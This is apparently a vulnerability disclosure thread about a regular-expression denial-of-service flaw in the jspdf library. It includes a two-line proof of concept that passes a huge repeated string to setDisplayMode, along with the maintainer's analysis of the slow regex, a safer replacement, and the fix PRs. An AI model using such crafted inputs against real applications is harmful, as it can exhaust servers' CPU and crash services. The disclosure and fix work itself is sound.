Inefficient Regular Expression Complexity in parallax/jspdf

Valid

Reported on

Jan 16th 2022


Description

The jspdf package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide crafted input to the setZoomMode functionality may cause an application to consume an excessive amount of CPU.

Proof of Concept

// PoC.js
var jsPDF = require("jspdf").jsPDF

const doc = new jsPDF({ orientation: "landscape", floatPrecision: 2 });
doc.setDisplayMode("300".repeat(50000));

Impact

This vulnerability is capable of exhausting system resources and leading to crashes.

We are processing your report and will contact the parallax/jspdf team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
We have contacted a member of the parallax/jspdf team and are waiting to hear back 4 months ago
parallax/jspdf maintainer
4 months ago

Maintainer


Thanks for the report.

The vulnerability boils down to the regular expression /^\d*\.?\d*%$/, which is slow, because of the ambiguity caused by \.?. The regular expression can be replaced with something like this:

/^(?:\d+\.\d*|\d*\.\d+|\d+)%$/

This regexp performs much better, as can be seen here: https://jsbench.me/0gkylc9kzt/1

How do we continue from here?

Yeting Li
4 months ago

Researcher


Hi @maintainer, I just verified that the repaired regular expression is safe. You can mark this issue as valid. Thanks a lot!

parallax/jspdf maintainer validated this vulnerability 4 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
parallax/jspdf maintainer
4 months ago

Maintainer


Done. @Yeting Li would you also like to prepare a pull request for the fix?

Yeting Li
4 months ago

Researcher


Hi @maintainer, I'm very glad to prepare a PR for the fix.

parallax/jspdf maintainer
4 months ago

Maintainer


Thanks.

Yeting Li
4 months ago

Researcher


I submitted a PR (please see the link https://github.com/parallax/jsPDF/pull/3366)

But there is a test case on Node 10, Node 14 that fails.

Yeting Li
4 months ago

Researcher


Thank you for your help. I submitted a new PR (please see https://github.com/parallax/jsPDF/pull/3368)

parallax/jspdf maintainer
4 months ago

Maintainer


Thanks. I've merged it now and will release the fix soon. Is there anything left to do? E.g. mark it as resolved?

Yeting Li
4 months ago

Researcher


Yes, you can mark it as resolved. Thanks a lot.

parallax/jspdf maintainer confirmed that a fix has been merged on 7315cc 4 months ago
The fix bounty has been dropped
jspdf.node.js#L1717 has been validated
jspdf.umd.js#L1816 has been validated
parallax/jspdf maintainer
4 months ago

Maintainer


I couldn't select you as the person who fixed it. How can I do that?

to join this conversation